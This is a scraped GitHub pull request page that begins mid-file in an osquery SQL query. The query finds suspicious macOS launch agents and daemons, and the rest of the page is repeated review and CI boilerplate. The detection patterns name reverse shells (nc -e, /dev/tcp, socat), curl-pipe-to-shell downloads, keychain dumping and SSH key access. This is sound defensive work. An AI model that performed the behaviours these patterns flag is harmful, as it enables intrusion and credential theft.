            AND (l.program LIKE '%Google%' OR l.program LIKE '%/Library/Application Support/Google/%')
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.microsoft.%' OR l.path LIKE '/Library/LaunchDaemons/com.microsoft.%')
            AND l.name LIKE 'com.microsoft.%'
            AND (l.program LIKE '%Microsoft%' OR l.program LIKE '%/Library/Application Support/Microsoft/%')
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.adobe.%' OR l.path LIKE '/Library/LaunchDaemons/com.adobe.%')
            AND l.name LIKE 'com.adobe.%'
            AND (l.program LIKE '%Adobe%' OR l.program LIKE '%/Library/Application Support/Adobe/%')
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.dropbox.%' OR l.path LIKE '/Library/LaunchDaemons/com.dropbox.%')
            AND l.name LIKE 'com.dropbox.%'
            AND l.program LIKE '%Dropbox%'
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchDaemons/com.docker.%' OR l.path LIKE '/Library/LaunchAgents/com.docker.%')
            AND l.name LIKE 'com.docker.%'
            AND l.program LIKE '%Docker%'
        )
        -- Whitelist: Standard binary paths
        AND NOT (
            l.program LIKE '/usr/bin/%'
            OR l.program LIKE '/usr/sbin/%'
            OR l.program LIKE '/bin/%'
            OR l.program LIKE '/sbin/%'
        )
),
lotl_indicators AS (
    SELECT
        l.name,
        l.path,
        l.program,
        l.program_arguments,
        l.run_at_load,
        l.keep_alive,
        l.on_demand,
        l.disabled,
        l.username,
        l.groupname,
        l.stdout_path,
        l.stderr_path,
        l.start_interval,
        CASE
            WHEN l.disabled = 1 THEN 'disabled'
            WHEN l.run_at_load = 1 THEN 'enabled_run_at_load'
            ELSE 'enabled'
        END AS status,
        0 AS is_non_whitelisted,
        1 AS is_lotl,
        CASE
            WHEN l.program LIKE '%curl' OR l.program_arguments LIKE '%curl %' THEN 'Download utility (curl) abuse'
            WHEN l.program LIKE '%wget' OR l.program_arguments LIKE '%wget %' THEN 'Download utility (wget) abuse'
            WHEN l.program_arguments LIKE '%curl%|%bash%' OR l.program_arguments LIKE '%curl%|%sh%' THEN 'Download and pipe to shell (curl|bash)'
            WHEN l.program_arguments LIKE '%wget%|%bash%' OR l.program_arguments LIKE '%wget%|%sh%' THEN 'Download and pipe to shell (wget|sh)'
            WHEN l.program_arguments LIKE '%nc -e%' OR l.program_arguments LIKE '%ncat -e%' THEN 'Reverse shell via netcat'
            WHEN l.program_arguments LIKE '%/dev/tcp/%' OR l.program_arguments LIKE '%/dev/udp/%' THEN 'Bash network redirection (reverse shell)'
            WHEN l.program_arguments LIKE '%socat%TCP%' OR l.program_arguments LIKE '%socat%EXEC%' THEN 'Socat reverse shell'
            WHEN l.program LIKE '/tmp/%' OR l.program LIKE '/var/tmp/%' OR l.program LIKE '/private/tmp/%' OR l.program LIKE '/private/var/tmp/%' THEN 'Execution from temporary directory'
            WHEN l.program LIKE '/Users/%/.*' OR l.program LIKE '%/.%' OR l.program_arguments LIKE '%/.%' THEN 'Execution from hidden directory'
            WHEN l.program LIKE '/Users/%/Downloads/%' THEN 'Execution from user Downloads folder'
            WHEN l.program LIKE '/Users/%/Desktop/%' THEN 'Execution from user Desktop'
            WHEN l.program_arguments LIKE '%base64 -d%' OR l.program_arguments LIKE '%base64 --decode%' OR l.program_arguments LIKE '%base64 -D%' THEN 'Base64 decode for obfuscation'
            WHEN l.program_arguments LIKE '%echo%|%base64%' THEN 'Base64 encoded command execution'
            WHEN l.program_arguments LIKE '%bash -c%' OR l.program_arguments LIKE '%sh -c%' OR l.program_arguments LIKE '%zsh -c%' THEN 'Shell command execution via -c flag'
            WHEN l.program_arguments LIKE '%bash -i%' OR l.program_arguments LIKE '%sh -i%' OR l.program_arguments LIKE '%zsh -i%' THEN 'Interactive shell invocation'
            WHEN l.program_arguments LIKE '%python -c%' OR l.program_arguments LIKE '%python3 -c%' THEN 'Python one-liner execution'
            WHEN l.program_arguments LIKE '%perl -e%' THEN 'Perl one-liner execution'
            WHEN l.program_arguments LIKE '%ruby -e%' THEN 'Ruby one-liner execution'
            WHEN l.program_arguments LIKE '%php -r%' THEN 'PHP one-liner execution'
            WHEN l.program LIKE '%osascript' AND l.program_arguments LIKE '%-e%' THEN 'AppleScript execution abuse (osascript -e)'
            WHEN l.program_arguments LIKE '%osascript%-%e%' THEN 'AppleScript inline execution'
            WHEN l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '%/Users/%/Library/LaunchAgents/%' THEN 'Persistent user-level agent with auto-restart'
            WHEN l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '/Library/LaunchDaemons/%' THEN 'Persistent system-level daemon with auto-restart'
            WHEN l.start_interval IS NOT NULL AND l.start_interval != '' AND l.path LIKE '%/Users/%/Library/LaunchAgents/%' THEN 'User-level periodic execution agent'
            WHEN l.stdout_path LIKE '%/.%' OR l.stderr_path LIKE '%/.%' THEN 'Output redirection to hidden file'
            WHEN l.program_arguments LIKE '%/.ssh/authorized_keys%' OR l.program_arguments LIKE '%/.ssh/id_rsa%' OR l.program_arguments LIKE '%/.ssh/id_ed25519%' THEN 'SSH key access detected'
            WHEN l.program_arguments LIKE '%security%find-generic-password%' OR l.program_arguments LIKE '%security%dump-keychain%' THEN 'Keychain credential access'
            WHEN l.program_arguments LIKE '%sudo -n%' OR l.program_arguments LIKE '%sudo --non-interactive%' THEN 'Sudo without password prompt'
            WHEN l.program_arguments LIKE '%chmod +s%' OR l.program_arguments LIKE '%chmod 4755%' OR l.program_arguments LIKE '%chmod 4777%' THEN 'Setuid bit modification (privilege escalation)'
            WHEN l.program LIKE '%nc' OR l.program LIKE '%netcat' OR l.program LIKE '%ncat' OR l.program_arguments LIKE '%nc %' OR l.program_arguments LIKE '%netcat%' THEN 'Netcat network utility abuse'
            WHEN l.program LIKE '%socat' OR l.program_arguments LIKE '%socat%' THEN 'Socat network utility abuse'
            WHEN (
                l.program_arguments LIKE '% eval %'
                OR l.program_arguments LIKE '% eval(%'
                OR l.program_arguments LIKE '%|eval %'
                OR l.program_arguments LIKE '%;eval %'
                OR l.program_arguments LIKE '% exec %'
                OR l.program_arguments LIKE '%|exec %'
                OR l.program_arguments LIKE '%;exec %'
                OR (l.program LIKE '%/bash' AND l.program_arguments LIKE '%eval%')
                OR (l.program LIKE '%/sh' AND l.program_arguments LIKE '%eval%')
                OR (l.program LIKE '%/zsh' AND l.program_arguments LIKE '%eval%')
            ) AND l.program NOT LIKE '/usr/libexec/%' THEN 'Eval/exec command execution'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM launchd AS l
    WHERE l.name IS NOT NULL
        AND l.name != ''
        AND l.program IS NOT NULL
        AND l.program != ''
        AND (
            l.program LIKE '%curl'
            OR l.program LIKE '%wget'
            OR l.program_arguments LIKE '%curl %'
            OR l.program_arguments LIKE '%wget %'
            OR l.program_arguments LIKE '%curl%|%bash%'
            OR l.program_arguments LIKE '%curl%|%sh%'
            OR l.program_arguments LIKE '%wget%|%bash%'
            OR l.program_arguments LIKE '%wget%|%sh%'
            OR l.program_arguments LIKE '%nc -e%'
            OR l.program_arguments LIKE '%ncat -e%'
            OR l.program_arguments LIKE '%/dev/tcp/%'
            OR l.program_arguments LIKE '%/dev/udp/%'
            OR l.program_arguments LIKE '%socat%TCP%'
            OR l.program_arguments LIKE '%socat%EXEC%'
            OR l.program LIKE '/tmp/%'
            OR l.program LIKE '/var/tmp/%'
            OR l.program LIKE '/private/tmp/%'
            OR l.program LIKE '/private/var/tmp/%'
            OR l.program LIKE '/Users/%/.*'
            OR l.program LIKE '%/.%'
            OR l.program LIKE '/Users/%/Downloads/%'
            OR l.program LIKE '/Users/%/Desktop/%'
            OR l.program_arguments LIKE '%/.%'
            OR l.program_arguments LIKE '%base64 -d%'
            OR l.program_arguments LIKE '%base64 --decode%'
            OR l.program_arguments LIKE '%base64 -D%'
            OR l.program_arguments LIKE '%echo%|%base64%'
            OR l.program_arguments LIKE '%bash -c%'
            OR l.program_arguments LIKE '%sh -c%'
            OR l.program_arguments LIKE '%zsh -c%'
            OR l.program_arguments LIKE '%bash -i%'
            OR l.program_arguments LIKE '%sh -i%'
            OR l.program_arguments LIKE '%zsh -i%'
            OR l.program_arguments LIKE '%python -c%'
            OR l.program_arguments LIKE '%python3 -c%'
            OR l.program_arguments LIKE '%perl -e%'
            OR l.program_arguments LIKE '%ruby -e%'
            OR l.program_arguments LIKE '%php -r%'
            OR (l.program LIKE '%osascript' AND l.program_arguments LIKE '%-e%')
            OR l.program_arguments LIKE '%osascript%-%e%'
            OR (l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '%/Users/%/Library/LaunchAgents/%')
            OR (l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '/Library/LaunchDaemons/%')
            OR (l.start_interval IS NOT NULL AND l.start_interval != '' AND l.path LIKE '%/Users/%/Library/LaunchAgents/%')
            OR l.stdout_path LIKE '%/.%'
            OR l.stderr_path LIKE '%/.%'
            OR l.program_arguments LIKE '%/.ssh/authorized_keys%'
            OR l.program_arguments LIKE '%/.ssh/id_rsa%'
            OR l.program_arguments LIKE '%/.ssh/id_ed25519%'
            OR l.program_arguments LIKE '%security%find-generic-password%'
            OR l.program_arguments LIKE '%security%dump-keychain%'
            OR l.program_arguments LIKE '%sudo -n%'
            OR l.program_arguments LIKE '%sudo --non-interactive%'
            OR l.program_arguments LIKE '%chmod +s%'
            OR l.program_arguments LIKE '%chmod 4755%'
            OR l.program_arguments LIKE '%chmod 4777%'
            OR l.program LIKE '%nc'
            OR l.program LIKE '%netcat'
            OR l.program LIKE '%ncat'
            OR l.program_arguments LIKE '%nc %'
            OR l.program_arguments LIKE '%netcat%'
            OR l.program LIKE '%socat'
            OR l.program_arguments LIKE '%socat%'
            OR (
                (
                    l.program_arguments LIKE '% eval %'
                    OR l.program_arguments LIKE '% eval(%'
                    OR l.program_arguments LIKE '%|eval %'
                    OR l.program_arguments LIKE '%;eval %'
                    OR l.program_arguments LIKE '% exec %'
                    OR l.program_arguments LIKE '%|exec %'
                    OR l.program_arguments LIKE '%;exec %'
                    OR (l.program LIKE '%/bash' AND l.program_arguments LIKE '%eval%')
                    OR (l.program LIKE '%/sh' AND l.program_arguments LIKE '%eval%')
                    OR (l.program LIKE '%/zsh' AND l.program_arguments LIKE '%eval%')
                )
                AND l.program NOT LIKE '/usr/libexec/%'
            )
        )
),
combined AS (
    SELECT
        l.name,
        l.path,
        l.program,
        l.program_arguments,
        l.run_at_load,
        l.keep_alive,
        l.on_demand,
        l.disabled,
        l.username,
        l.groupname,
        l.stdout_path,
        l.stderr_path,
        l.start_interval,
        COALESCE(
            MAX(li.status),
            MAX(nw.status)
        ) AS status,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'Launch Agent/Daemon (LotL)'
            ELSE 'Launch Agent/Daemon'
        END AS type,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN 'LOTL_INDICATOR + NON_WHITELISTED'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'LOTL_INDICATOR'
            ELSE 'NON_WHITELISTED'
        END AS detection_method,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN MAX(li.lotl_reason) || ' + Not in known-good allowlist'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN MAX(li.lotl_reason)
            ELSE 'Launch agent/daemon not in known-good allowlist'
        END AS detection_reason
    FROM launchd AS l
    LEFT JOIN non_whitelisted AS nw ON l.name = nw.name AND l.path = nw.path AND l.program = nw.program
    LEFT JOIN lotl_indicators AS li ON l.name = li.name AND l.path = li.path AND l.program = li.program
    WHERE COALESCE(nw.is_non_whitelisted, 0) = 1 OR COALESCE(li.is_lotl, 0) = 1
    GROUP BY l.name, l.path, l.program, l.program_arguments, l.run_at_load, l.keep_alive, l.on_demand, l.disabled, l.username, l.groupname, l.stdout_path, l.stderr_path, l.start_interval
)
SELECT
    c.name,
    c.path,
    c.program,
    c.program_arguments,
    c.type,
    c.run_at_load,
    c.keep_alive,
    c.on_demand,
    c.disabled,
    c.status,
    c.username,
    c.groupname,
    c.stdout_path,
    c.stderr_path,
    c.start_interval,
    c.detection_method,
    c.detection_reason,
    s.signed,
    s.identifier,
    h.sha256,
    h.sha1,
    h.md5,
    f.size,
    f.mtime,
    f.ctime,
    f.directory
FROM combined AS c
LEFT JOIN signature AS s ON c.program = s.path
LEFT JOIN hash AS h ON c.program = h.path
LEFT JOIN file AS f ON c.program = f.path
WHERE (
    c.detection_method LIKE 'LOTL_INDICATOR%'
    OR s.signed IS NULL
    OR s.signed = 0
    OR (
        s.identifier IS NOT NULL
        AND s.identifier NOT LIKE 'com.apple.%'
        AND s.identifier NOT LIKE 'Apple Inc.%'
    )
)
ORDER BY
    CASE WHEN c.detection_method LIKE 'LOTL_INDICATOR%' THEN 0 ELSE 1 END,
    c.detection_reason,
    c.run_at_load DESC,
    c.keep_alive DESC,
    c.name

This PR was AI assisted with Claude Code

elasticmachine · 2025-11-21T16:59:11Z

💚 Build Succeeded

Buildkite Build
Commit: ded2180

tomsonpl added 3 commits November 21, 2025 17:24

scheduled_tasks artifacts

eaf8dac

fix version

751a42f

fix

ded2180

tomsonpl marked this pull request as ready for review November 21, 2025 16:37

tomsonpl requested a review from a team as a code owner November 21, 2025 16:37

tomsonpl requested review from gergoabraham and paul-tavares and removed request for a team November 21, 2025 16:37

andrewkroh added documentation Improvements or additions to documentation. Applied to PRs that modify *.md files. Integration:osquery_manager Osquery Manager labels Nov 21, 2025

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[Osquery_manager] Scheduled tasks artifact saved query #16082

[Osquery_manager] Scheduled tasks artifact saved query #16082

Uh oh!

tomsonpl commented Nov 21, 2025

Uh oh!

elasticmachine commented Nov 21, 2025

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

[Osquery_manager] Scheduled tasks artifact saved query #16082

Are you sure you want to change the base?

[Osquery_manager] Scheduled tasks artifact saved query #16082

Uh oh!

Conversation

tomsonpl commented Nov 21, 2025

Scheduled Tasks Artifact (Cross-Platform Persistence Detection)

Core Forensic Artifacts Coverage

Queries by Platform

Description

Result

Platform

Interval

Query ID

ECS Field Mappings

SQL Query

Description

Result

Platform

Interval

Query ID

ECS Field Mappings

SQL Query

Description

Result

Platform

Interval

Query ID

ECS Field Mappings

SQL Query

Uh oh!

elasticmachine commented Nov 21, 2025

💚 Build Succeeded

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants